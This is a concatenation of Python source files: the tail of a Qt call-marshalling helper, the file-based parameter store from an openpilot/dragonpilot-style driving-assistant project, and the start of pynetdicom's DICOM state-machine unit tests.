    """Marshals calls onto the Qt main thread via the "executeSignal" signal.

    executeMethod() queues a callable for execution in the GUI thread;
    callLater() defers that by *delay* seconds using a worker thread.
    """

    ###########################################################################
    def __init__(self, mainWnd):
        self.mainWnd = mainWnd
        self.mainWnd.connect(\
            self.mainWnd, SIGNAL("executeSignal"), self.methodSlot)

        # callable -> most recent args for a pending delayed execution
        self.waiting = {}

    ###########################################################################
    def executeMethod(self, _callable, *args):
        """Emit the signal so that _callable(*args) runs in the main thread."""
        self.mainWnd.emit(SIGNAL("executeSignal"), _callable, *args)

    ###########################################################################
    def methodSlot(self, _callable, *args):
        """Slot, executed in the main thread: invoke the queued callable."""
        _callable(*args)

    ###########################################################################
    def callLater(self, delay, _callable, *_args):
        # If a given method is already waiting on delayed execution, update
        # the args and return; the running timer thread reads the latest args
        # from self.waiting when it fires (see callLaterThread).
        if _callable in self.waiting:
            self.waiting[_callable] = _args
            return

        self.waiting[_callable] = _args
        thr = Thread(target=self.callLaterThread, args=(delay, _callable) + _args)
        # Daemonize so pending timers can never keep the process alive.
        thr.daemon = True
        thr.start()

    ###########################################################################
    def callLaterThread(self, delay, _callable, *args):
        sleep(delay)
        # Re-read the *current* args: callLater may have refreshed them while
        # we slept. (The original implementation popped the entry but used the
        # args captured at thread start, so such refreshes were silently
        # ignored.) Fall back to the captured args if the entry is gone.
        args = self.waiting.pop(_callable, args)
        self.executeMethod(_callable, *args)
params.py | #!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import string
import binascii
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
    """Create directory *path* (including parents); no-op if it already exists.

    Raises OSError if creation fails or *path* exists as a non-directory,
    matching the original try/except-isdir dance — `exist_ok=True` is the
    stdlib equivalent and race-free.
    """
    os.makedirs(path, exist_ok=True)
class TxType(Enum):
    """Persistence class of a param key: when, if ever, it is auto-cleared."""
    PERSISTENT = 1
    CLEAR_ON_MANAGER_START = 2
    CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
    """Raised when a param key is not declared in the ``keys`` registry below."""
    pass
# Registry of every known param key and its persistence class (see TxType).
# Params.get()/put() refuse any key that is not declared here.
keys = {
  "AccessToken": [TxType.CLEAR_ON_MANAGER_START],
  "AthenadPid": [TxType.PERSISTENT],
  "CalibrationParams": [TxType.PERSISTENT],
  "CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
  "CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
  "CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
  "CommunityFeaturesToggle": [TxType.PERSISTENT],
  "CompletedTrainingVersion": [TxType.PERSISTENT],
  "ControlsParams": [TxType.PERSISTENT],
  "DisablePowerDown": [TxType.PERSISTENT],
  "DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
  "DongleId": [TxType.PERSISTENT],
  "GitBranch": [TxType.PERSISTENT],
  "GitCommit": [TxType.PERSISTENT],
  "GitRemote": [TxType.PERSISTENT],
  "GithubSshKeys": [TxType.PERSISTENT],
  "HasAcceptedTerms": [TxType.PERSISTENT],
  "HasCompletedSetup": [TxType.PERSISTENT],
  "IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
  "IsLdwEnabled": [TxType.PERSISTENT],
  "IsGeofenceEnabled": [TxType.PERSISTENT],
  "IsMetric": [TxType.PERSISTENT],
  "IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
  "IsRHD": [TxType.PERSISTENT],
  "IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
  "IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
  "IsUploadRawEnabled": [TxType.PERSISTENT],
  "LastAthenaPingTime": [TxType.PERSISTENT],
  "LastUpdateTime": [TxType.PERSISTENT],
  "LimitSetSpeed": [TxType.PERSISTENT],
  "LimitSetSpeedNeural": [TxType.PERSISTENT],
  "LiveParameters": [TxType.PERSISTENT],
  "LongitudinalControl": [TxType.PERSISTENT],
  "OpenpilotEnabledToggle": [TxType.PERSISTENT],
  "LaneChangeEnabled": [TxType.PERSISTENT],
  "PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
  "PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
  "PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
  "Passive": [TxType.PERSISTENT],
  "RecordFront": [TxType.PERSISTENT],
  "ReleaseNotes": [TxType.PERSISTENT],
  "ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
  "SpeedLimitOffset": [TxType.PERSISTENT],
  "SubscriberInfo": [TxType.PERSISTENT],
  "TermsVersion": [TxType.PERSISTENT],
  "TrainingVersion": [TxType.PERSISTENT],
  "UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
  "UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
  "Version": [TxType.PERSISTENT],
  "Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
  "Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
  "Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
  "Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
  "Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
  "Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
  "Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
  #dragonpilot config
  "DragonEnableDashcam": [TxType.PERSISTENT],
  "DragonEnableAutoShutdown": [TxType.PERSISTENT],
  "DragonAutoShutdownAt": [TxType.PERSISTENT],
  "DragonEnableSteeringOnSignal": [TxType.PERSISTENT],
  "DragonEnableLogger": [TxType.PERSISTENT],
  "DragonEnableUploader": [TxType.PERSISTENT],
  "DragonNoctuaMode": [TxType.PERSISTENT],
  "DragonCacheCar": [TxType.PERSISTENT],
  "DragonCachedModel": [TxType.CLEAR_ON_MANAGER_START], # deprecated
  "DragonCachedFP": [TxType.CLEAR_ON_MANAGER_START], # deprecated
  "DragonCachedVIN": [TxType.CLEAR_ON_MANAGER_START], # deprecated
  "DragonCachedCarFW": [TxType.CLEAR_ON_MANAGER_START], # deprecated
  "DragonCachedSource": [TxType.CLEAR_ON_MANAGER_START], # deprecated
  "DragonAllowGas": [TxType.PERSISTENT],
  "DragonToyotaStockDSU": [TxType.PERSISTENT],
  "DragonLatCtrl": [TxType.PERSISTENT],
  "DragonUISpeed": [TxType.PERSISTENT],
  "DragonUIEvent": [TxType.PERSISTENT],
  "DragonUIMaxSpeed": [TxType.PERSISTENT],
  "DragonUIFace": [TxType.PERSISTENT],
  "DragonUIDev": [TxType.PERSISTENT],
  "DragonUIDevMini": [TxType.PERSISTENT],
  "DragonEnableTomTom": [TxType.PERSISTENT],
  "DragonBootTomTom": [TxType.PERSISTENT],
  "DragonRunTomTom": [TxType.PERSISTENT],
  "DragonEnableAutonavi": [TxType.PERSISTENT],
  "DragonBootAutonavi": [TxType.PERSISTENT],
  "DragonRunAutonavi": [TxType.PERSISTENT],
  "DragonEnableAegis": [TxType.PERSISTENT],
  "DragonBootAegis": [TxType.PERSISTENT],
  "DragonRunAegis": [TxType.PERSISTENT],
  "DragonEnableMixplorer": [TxType.PERSISTENT],
  "DragonRunMixplorer": [TxType.PERSISTENT],
  "DragonSteeringMonitorTimer": [TxType.PERSISTENT],
  "DragonCameraOffset": [TxType.PERSISTENT],
  "DragonUIVolumeBoost": [TxType.PERSISTENT],
  "DragonGreyPandaMode": [TxType.PERSISTENT],
  "DragonDrivingUI": [TxType.PERSISTENT],
  "DragonDisplaySteeringLimitAlert": [TxType.PERSISTENT],
  "DragonChargingCtrl": [TxType.PERSISTENT],
  "DragonCharging": [TxType.PERSISTENT],
  "DragonDisCharging": [TxType.PERSISTENT],
  "DragonToyotaLaneDepartureWarning": [TxType.PERSISTENT],
  "DragonUILane": [TxType.PERSISTENT],
  "DragonUILead": [TxType.PERSISTENT],
  "DragonUIPath": [TxType.PERSISTENT],
  "DragonUIBlinker": [TxType.PERSISTENT],
  "DragonUIDMView": [TxType.PERSISTENT],
  "DragonEnableDriverMonitoring": [TxType.PERSISTENT],
  "DragonCarModel": [TxType.CLEAR_ON_MANAGER_START],
  "DragonEnableSlowOnCurve": [TxType.PERSISTENT],
  "DragonEnableLeadCarMovingAlert": [TxType.PERSISTENT],
  "DragonToyotaSnGMod": [TxType.PERSISTENT],
  "DragonWazeMode": [TxType.PERSISTENT],
  "DragonRunWaze": [TxType.PERSISTENT],
  "DragonEnableAutoLC": [TxType.PERSISTENT],
  "DragonAssistedLCMinMPH": [TxType.PERSISTENT],
  "DragonAutoLCMinMPH": [TxType.PERSISTENT],
  "DragonAutoLCDelay": [TxType.PERSISTENT],
  "DragonBTG": [TxType.PERSISTENT],
  "DragonBootHotspot": [TxType.PERSISTENT],
  "DragonAccelProfile": [TxType.PERSISTENT],
  "DragonLastModified": [TxType.CLEAR_ON_MANAGER_START],
  "DragonEnableRegistration": [TxType.PERSISTENT],
  "DragonDynamicFollow": [TxType.PERSISTENT],
  "DragonToyotaSngResponse": [TxType.PERSISTENT],
  "DragonEnableGearCheck": [TxType.PERSISTENT],
  "DragonEnableTempMonitor": [TxType.PERSISTENT],
  "DragonAppAutoUpdate": [TxType.PERSISTENT],
  "DragonUpdating": [TxType.CLEAR_ON_MANAGER_START],
  "DragonCustomModel": [TxType.PERSISTENT],
  "DragonSupportedCars": [TxType.PERSISTENT],
  "DragonLocale": [TxType.PERSISTENT],
  "DragonUIScreenOffReversing": [TxType.PERSISTENT],
  "DragonEnableSRLearner": [TxType.PERSISTENT],
  "DragonEnableSteerBoost": [TxType.PERSISTENT],
  "DragonSteerBoostMin": [TxType.PERSISTENT],
  "DragonSteerBoostMax": [TxType.PERSISTENT],
  "DragonSteerBoostMinAt": [TxType.PERSISTENT],
  "DragonSteerBoostMaxAt": [TxType.PERSISTENT],
  "DragonDashcamHours": [TxType.PERSISTENT],
  "DragonUIScreenOffDriving": [TxType.PERSISTENT],
  "DragonEnableAutoUpdate": [TxType.PERSISTENT],
  "DragonUIBrightness": [TxType.PERSISTENT],
  "DragonDashcamImpactDetect": [TxType.PERSISTENT],
  "AndrewSteerRateCost": [TxType.PERSISTENT],
  "AndrewSteerLimitTimer": [TxType.PERSISTENT],
  "AndrewINDIInnerLoopGain": [TxType.PERSISTENT],
  "AndrewINDIOuterLoopGain": [TxType.PERSISTENT],
  "AndrewINDIActuatorEffectiveness": [TxType.PERSISTENT],
  "AndrewINDITimeConstant": [TxType.PERSISTENT],
  "AndrewSteerActuatorDelay": [TxType.PERSISTENT],
  "AndrewTryLQR": [TxType.PERSISTENT],
  "DragonDashcamImpactDetectStarted": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
    """Flush directory metadata for *path* to disk (fsync on the dir's fd).

    Needed after rename/symlink so the directory entry itself is durable.
    """
    dir_fd = os.open(path, os.O_RDONLY)
    try:
        os.fsync(dir_fd)
    finally:
        os.close(dir_fd)
class FileLock():
    """Advisory exclusive lock on a file, taken with flock().

    Closing the fd releases the lock. In addition to the original explicit
    acquire()/release() API, instances may now be used as context managers.
    """
    def __init__(self, path, create):
        self._path = path
        self._create = create  # create the lock file if it is missing
        self._fd = None

    def acquire(self):
        """Open (optionally creating) the lock file and block until locked."""
        self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
        fcntl.flock(self._fd, fcntl.LOCK_EX)

    def release(self):
        """Release the lock by closing the fd; safe to call when not held."""
        if self._fd is not None:
            os.close(self._fd)
            self._fd = None

    def __enter__(self):
        self.acquire()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.release()
class DBAccessor():
    """Shared read machinery for the params DB (a directory of key files).

    Subclasses populate self._vals in __enter__ before any access.
    """
    def __init__(self, path):
        self._path = path
        self._vals = None  # key -> bytes; None until entered

    def keys(self):
        self._check_entered()
        return self._vals.keys()

    def get(self, key):
        """Return the cached value for *key*, or None if absent."""
        self._check_entered()
        return self._vals.get(key)

    def _get_lock(self, create):
        """Acquire and return the DB-wide file lock."""
        lock = FileLock(os.path.join(self._path, ".lock"), create)
        lock.acquire()
        return lock

    def _read_values_locked(self):
        """Callers should hold a lock while calling this method."""
        vals = {}
        try:
            data_path = self._data_path()
            for name in os.listdir(data_path):
                with open(os.path.join(data_path, name), "rb") as f:
                    vals[name] = f.read()
        except (OSError, IOError) as e:
            # Either the DB hasn't been created yet, or somebody wrote a bug
            # and left the DB in an inconsistent state. Either way, empty.
            if e.errno == errno.ENOENT:
                return {}
        return vals

    def _data_path(self):
        return os.path.join(self._path, "d")

    def _check_entered(self):
        if self._vals is None:
            raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
    """Consistent read-only snapshot of the params DB.

    Takes the lock (only if the lock file already exists) just long enough to
    read all keys into memory.
    """
    def __enter__(self):
        try:
            lock = self._get_lock(False)
        except OSError as e:
            # Do not create lock if it does not exist: the DB was never
            # written to, so present an empty snapshot.
            if e.errno == errno.ENOENT:
                self._vals = {}
                return self
            # Any other failure is a real error. The original code swallowed
            # it and fell through with `lock` unbound, dying later with a
            # NameError in the finally clause.
            raise

        try:
            # Read everything while the lock is held.
            self._vals = self._read_values_locked()
            return self
        finally:
            lock.release()

    def __exit__(self, type, value, traceback): pass
class DBWriter(DBAccessor):
    """Read-write transaction over the params DB.

    All values are read into memory on __enter__ and written back atomically
    on __exit__ by building a fresh data directory and symlink-swapping it
    into place, so a crash never leaves a half-written DB.
    """
    def __init__(self, path):
        super(DBWriter, self).__init__(path)
        self._lock = None
        self._prev_umask = None

    def put(self, key, value):
        # Stage a value in memory; persisted on __exit__.
        self._vals[key] = value

    def delete(self, key):
        # Stage a deletion; persisted on __exit__. Missing keys are ignored.
        self._vals.pop(key, None)

    def __enter__(self):
        mkdirs_exists_ok(self._path)

        # Make sure we can write and that permissions are correct.
        self._prev_umask = os.umask(0)

        try:
            os.chmod(self._path, 0o777)
            self._lock = self._get_lock(True)
            self._vals = self._read_values_locked()
        except:
            # Restore the umask before propagating so callers aren't left
            # with umask(0) in effect.
            os.umask(self._prev_umask)
            self._prev_umask = None
            raise

        return self

    def __exit__(self, type, value, traceback):
        self._check_entered()
        try:
            # data_path refers to the externally used path to the params. It is a symlink.
            # old_data_path is the path currently pointed to by data_path.
            # tempdir_path is a path where the new params will go, which the new data path will point to.
            # new_data_path is a temporary symlink that will atomically overwrite data_path.
            #
            # The current situation is:
            #   data_path -> old_data_path
            # We're going to write params data to tempdir_path
            #   tempdir_path -> params data
            # Then point new_data_path to tempdir_path
            #   new_data_path -> tempdir_path
            # Then atomically overwrite data_path with new_data_path
            #   data_path -> tempdir_path
            old_data_path = None
            new_data_path = None
            tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)

            try:
                # Write back all keys.
                os.chmod(tempdir_path, 0o777)
                for k, v in self._vals.items():
                    with open(os.path.join(tempdir_path, k), "wb") as f:
                        f.write(v)
                        f.flush()
                        os.fsync(f.fileno())
                fsync_dir(tempdir_path)

                data_path = self._data_path()
                try:
                    old_data_path = os.path.join(self._path, os.readlink(data_path))
                except (OSError, IOError):
                    # NOTE(mgraczyk): If other DB implementations have bugs, this could cause
                    # copies to be left behind, but we still want to overwrite.
                    pass

                new_data_path = "{}.link".format(tempdir_path)
                os.symlink(os.path.basename(tempdir_path), new_data_path)
                os.rename(new_data_path, data_path)
                fsync_dir(self._path)
            finally:
                # If the rename worked, we can delete the old data. Otherwise delete the new one.
                success = new_data_path is not None and os.path.exists(data_path) and (
                    os.readlink(data_path) == os.path.basename(tempdir_path))

                if success:
                    if old_data_path is not None:
                        shutil.rmtree(old_data_path)
                else:
                    shutil.rmtree(tempdir_path)

                # Regardless of what happened above, there should be no link at new_data_path.
                if new_data_path is not None and os.path.islink(new_data_path):
                    os.remove(new_data_path)
        finally:
            os.umask(self._prev_umask)
            self._prev_umask = None

            # Always release the lock.
            self._lock.release()
            self._lock = None
def read_db(params_path, key):
    """Lock-free read of a single key; returns bytes, or None if missing."""
    try:
        with open("%s/d/%s" % (params_path, key), "rb") as f:
            return f.read()
    except IOError:
        return None
def write_db(params_path, key, value):
    """Atomically write a single key while holding the DB lock.

    str values are encoded as UTF-8. The value is written to a temp file,
    fsync'd, and renamed into place so readers never observe a partial write.
    """
    if isinstance(value, str):
        value = value.encode('utf8')

    prev_umask = os.umask(0)
    lock = FileLock(params_path+"/.lock", True)
    lock.acquire()

    try:
        # mkstemp (unlike the racy, deprecated mktemp the original used)
        # atomically creates and opens the temp file.
        tmp_fd, tmp_path = tempfile.mkstemp(prefix=".tmp", dir=params_path)
        with os.fdopen(tmp_fd, "wb") as f:
            f.write(value)
            f.flush()
            os.fsync(f.fileno())
        # mkstemp creates the file 0600; restore the world-readable mode the
        # original open()-under-umask(0) produced so other processes can read.
        os.chmod(tmp_path, 0o666)

        path = "%s/d/%s" % (params_path, key)
        os.rename(tmp_path, path)
        fsync_dir(os.path.dirname(path))
    finally:
        os.umask(prev_umask)
        lock.release()
class Params():
    """High-level interface to the on-disk params store rooted at *db*."""
    def __init__(self, db=PARAMS):
        self.db = db

        # create the database if it doesn't exist...
        if not os.path.exists(self.db+"/d"):
            with self.transaction(write=True):
                pass

    def clear_all(self):
        """Delete the entire store and recreate it empty."""
        shutil.rmtree(self.db, ignore_errors=True)
        with self.transaction(write=True):
            pass

    def transaction(self, write=False):
        """Return a context-managed snapshot: DBWriter if write, else DBReader."""
        if write:
            return DBWriter(self.db)
        else:
            return DBReader(self.db)

    def _clear_keys_with_type(self, tx_type):
        # Delete every registered key whose declared lifetime matches tx_type.
        with self.transaction(write=True) as txn:
            for key in keys:
                if tx_type in keys[key]:
                    txn.delete(key)

    def manager_start(self):
        """Clear keys flagged CLEAR_ON_MANAGER_START (call at manager boot)."""
        self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)

    def panda_disconnect(self):
        """Clear keys flagged CLEAR_ON_PANDA_DISCONNECT."""
        self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)

    def delete(self, key):
        """Remove *key* from the store (no-op if absent)."""
        with self.transaction(write=True) as txn:
            txn.delete(key)

    def get(self, key, block=False, encoding=None):
        """Read *key* as bytes; poll until it exists if block=True, and
        decode with *encoding* if given. Raises UnknownKeyName for
        unregistered keys."""
        if key not in keys:
            raise UnknownKeyName(key)

        while 1:
            ret = read_db(self.db, key)
            if not block or ret is not None:
                break
            # is polling really the best we can do?
            time.sleep(0.05)

        if ret is not None and encoding is not None:
            ret = ret.decode(encoding)

        return ret

    def put(self, key, dat):
        """
        Warning: This function blocks until the param is written to disk!
        In very rare cases this can take over a second, and your code will hang.

        Use the put_nonblocking helper function in time sensitive code, but
        in general try to avoid writing params as much as possible.
        """
        if key not in keys:
            raise UnknownKeyName(key)

        write_db(self.db, key, dat)
def put_nonblocking(key, val):
    """Write *key* on a background thread and return the already-started thread.

    Use this instead of Params().put() in time-sensitive code; join the
    returned thread if you need to know the write completed.
    """
    def f(key, val):
        params = Params()
        params.put(key, val)

    t = threading.Thread(target=f, args=(key, val))
    t.start()
    return t
if __name__ == "__main__":
    # CLI: `params.py <key> <value>` writes one key; with no value, dump all.
    params = Params()
    if len(sys.argv) > 2:
        params.put(sys.argv[1], sys.argv[2])
    else:
        for k in keys:
            pp = params.get(k)
            if pp is None:
                print("%s is None" % k)
            elif all(chr(c) in string.printable for c in pp):
                print("%s = %s" % (k, pp))
            else:
                # Binary value: print hex rather than raw bytes.
                print("%s = %s" % (k, binascii.hexlify(pp)))

    # Test multiprocess:
    # seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
    # while python common/params.py DongleId; do sleep 0.05; done
|
test_fsm.py | """Unit tests for fsm.py"""
import datetime
import logging
import socket
from struct import pack
import threading
import time
import pytest
from pynetdicom import AE, build_context, evt, debug_logger
from pynetdicom.association import Association
from pynetdicom import fsm as FINITE_STATE
from pynetdicom.fsm import *
from pynetdicom.dimse_primitives import C_ECHO
from pynetdicom.pdu_primitives import (
A_ASSOCIATE,
A_ABORT,
A_P_ABORT,
P_DATA,
A_RELEASE,
MaximumLengthNotification,
ImplementationClassUIDNotification,
)
from pynetdicom.sop_class import Verification
from pynetdicom.transport import AssociationSocket
from .encoded_pdu_items import (
a_associate_ac,
a_associate_rq,
a_associate_rj,
p_data_tf,
a_abort,
a_release_rq,
a_release_rp,
)
from .parrot import ThreadedParrot
# debug_logger()
# (event, states) tables driving the parametrized StateMachine tests below:
# REFERENCE_BAD_EVENTS lists, per event, the states in which do_action must
# raise InvalidEventError; REFERENCE_GOOD_EVENTS lists the states in which
# the corresponding action is expected to run.
REFERENCE_BAD_EVENTS = [
    # Event, bad states
    ("Evt1", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # A-ASSOCIATE (rq) p
    ("Evt2", [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # Connection available
    ("Evt3", [1, 4]),  # A-ASSOCIATE-AC PDU recv
    ("Evt4", [1, 4]),  # A-ASSOCIATE-RJ PDU recv
    ("Evt5", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # Connection open
    ("Evt6", [1, 4]),  # A-ASSOCIATE-RQ PDU recv
    ("Evt7", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # A-ASSOCIATE (ac) p
    ("Evt8", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # A-ASSOCIATE (rj) p
    ("Evt9", [1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13]),  # P-DATA primitive
    ("Evt10", [1, 4]),  # P-DATA-TF PDU
    ("Evt11", [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13]),  # A-RELEASE (rq) p
    ("Evt12", [1, 4]),  # A-RELEASE-RQ PDU recv
    ("Evt13", [1, 4]),  # A-RELEASE-RP PDU recv
    ("Evt14", [1, 2, 3, 4, 5, 6, 7, 10, 11, 13]),  # A-RELEASE (rsp) primitive
    ("Evt15", [1, 2, 13]),  # A-ABORT (rq) primitive
    ("Evt16", [1, 4]),  # A-ABORT PDU recv
    ("Evt17", [1]),  # Connection closed
    ("Evt18", [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]),  # ARTIM expired
    ("Evt19", [1, 4]),  # Unrecognised PDU rev
]
REFERENCE_GOOD_EVENTS = [
    # Event, good states
    ("Evt1", [1]),  # A-ASSOCIATE (rq) p
    ("Evt2", [4]),  # Connection available
    ("Evt3", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # A-ASSOCIATE-AC PDU recv
    ("Evt4", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # A-ASSOCIATE-RJ PDU recv
    ("Evt5", [1]),  # Connection open
    ("Evt6", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # A-ASSOCIATE-RQ PDU recv
    ("Evt7", [3]),  # A-ASSOCIATE (ac) p
    ("Evt8", [3]),  # A-ASSOCIATE (rj) p
    ("Evt9", [6, 8]),  # P-DATA primitive
    ("Evt10", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # P-DATA-TF PDU
    ("Evt11", [6]),  # A-RELEASE (rq) p
    ("Evt12", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # A-RELEASE-RQ PDU recv
    ("Evt13", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # A-RELEASE-RP PDU recv
    ("Evt14", [8, 9, 12]),  # A-RELEASE (rsp) primitive
    ("Evt15", [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]),  # A-ABORT (rq) primitive
    ("Evt16", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # A-ABORT PDU recv
    ("Evt17", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # Connection closed
    ("Evt18", [2, 13]),  # ARTIM expired
    ("Evt19", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]),  # Unrecognised PDU rev
]
class BadDUL:
    """A DUL that always raises an exception during actions."""

    def __init__(self):
        self.is_killed = False  # set by kill_dul(); inspected by tests

    def kill_dul(self):
        """Hook for testing whether DUL got killed."""
        self.is_killed = True

    @property
    def primitive(self):
        """Prevent StateMachine from setting primitive."""
        return None
class TestStateMachine:
    """Non-functional unit tests for fsm.StateMachine."""

    def test_init(self):
        """Test creation of new StateMachine."""
        ae = AE()
        ae.add_requested_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5
        assoc = Association(ae, mode="requestor")

        fsm = assoc.dul.state_machine
        assert fsm.current_state == "Sta1"
        assert fsm.dul == assoc.dul

    def test_invalid_transition_raises(self):
        """Test StateMachine.transition using invalid states raises."""
        ae = AE()
        ae.add_requested_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5
        assoc = Association(ae, mode="requestor")

        fsm = assoc.dul.state_machine
        msg = r"Invalid state 'Sta0' for State Machine"
        with pytest.raises(ValueError, match=msg):
            fsm.transition("Sta0")

    def test_valid_transition(self):
        """Test StateMachine.transition using valid states."""
        ae = AE()
        ae.add_requested_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5
        assoc = Association(ae, mode="requestor")
        fsm = assoc.dul.state_machine

        for ii in range(1, 14):
            assert 1 <= ii <= 13
            fsm.transition("Sta{}".format(ii))
            assert fsm.current_state == "Sta{}".format(ii)

    @pytest.mark.parametrize("event, states", REFERENCE_BAD_EVENTS)
    def test_invalid_action_raises(self, event, states):
        """Test StateMachine.do_action raises exception if action invalid."""
        ae = AE()
        ae.add_requested_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5
        assoc = Association(ae, mode="requestor")
        fsm = assoc.dul.state_machine

        for state in states:
            state = "Sta{}".format(state)
            fsm.current_state = state

            # (was a redundant double assignment: `msg = msg = ...`)
            msg = r"Invalid event '{}' for the current state '{}'".format(
                event, state
            )
            with pytest.raises(InvalidEventError, match=msg):
                fsm.do_action(event)

    @pytest.mark.parametrize("event, states", REFERENCE_GOOD_EVENTS)
    def test_exception_during_action(self, event, states):
        """Test an exception raised during an action kill the DUL."""
        ae = AE()
        ae.add_requested_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5
        assoc = Association(ae, mode="requestor")
        fsm = assoc.dul.state_machine
        fsm.dul = BadDUL()

        for state in states:
            fsm.dul.is_killed = False
            state = "Sta{}".format(state)
            fsm.current_state = state
            with pytest.raises(AttributeError):
                fsm.do_action(event)
            assert fsm.dul.is_killed is True
            assert fsm.current_state == state
class TestStateBase:
    """Base class for State tests.

    Builds a requestor Association with a monkey-patched state machine that
    records every transition/event, plus helpers to run a scripted "parrot"
    server and to construct DUL primitives.
    """

    # NOTE(review): `setup`/`teardown` are the old nose-style pytest hooks;
    # newer pytest prefers `setup_method`/`teardown_method` — confirm the
    # project's pytest version before renaming.
    def setup(self):
        ae = AE()
        ae.add_requested_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5
        assoc = Association(ae, mode="requestor")
        assoc.set_socket(AssociationSocket(assoc))

        # Association Acceptor object -> remote AE
        assoc.acceptor.ae_title = "ANY_SCU"
        assoc.acceptor.address = "localhost"
        assoc.acceptor.port = 11112

        # Association Requestor object -> local AE
        assoc.requestor.address = ""
        assoc.requestor.port = 11113
        assoc.requestor.ae_title = ae.ae_title
        assoc.requestor.maximum_length = 16382
        assoc.requestor.implementation_class_uid = ae.implementation_class_uid
        assoc.requestor.implementation_version_name = ae.implementation_version_name

        cx = build_context(Verification)
        cx.context_id = 1
        assoc.requestor.requested_contexts = [cx]

        self.assoc = assoc
        self.fsm = self.monkey_patch(assoc.dul.state_machine)
        self.scp = None

    def teardown(self):
        # Step the scripted server through any remaining commands before
        # shutting it down, so its thread can exit cleanly.
        if self.scp:
            for commands in self.scp.commands:
                self.scp.step()
            # self.scp.commands = [('exit', None)]
            # self.scp.step()
            self.scp.shutdown()

    def get_associate(self, assoc_type):
        """Build an A_ASSOCIATE primitive of kind request/accept/reject."""
        primitive = A_ASSOCIATE()
        if assoc_type == "request":
            primitive.application_context_name = "1.2.3.4.5.6"
            # Calling AE Title is the source DICOM AE title
            primitive.calling_ae_title = "LOCAL_AE_TITLE "
            # Called AE Title is the destination DICOM AE title
            primitive.called_ae_title = "REMOTE_AE_TITLE "
            # The TCP/IP address of the source, pynetdicom includes port too
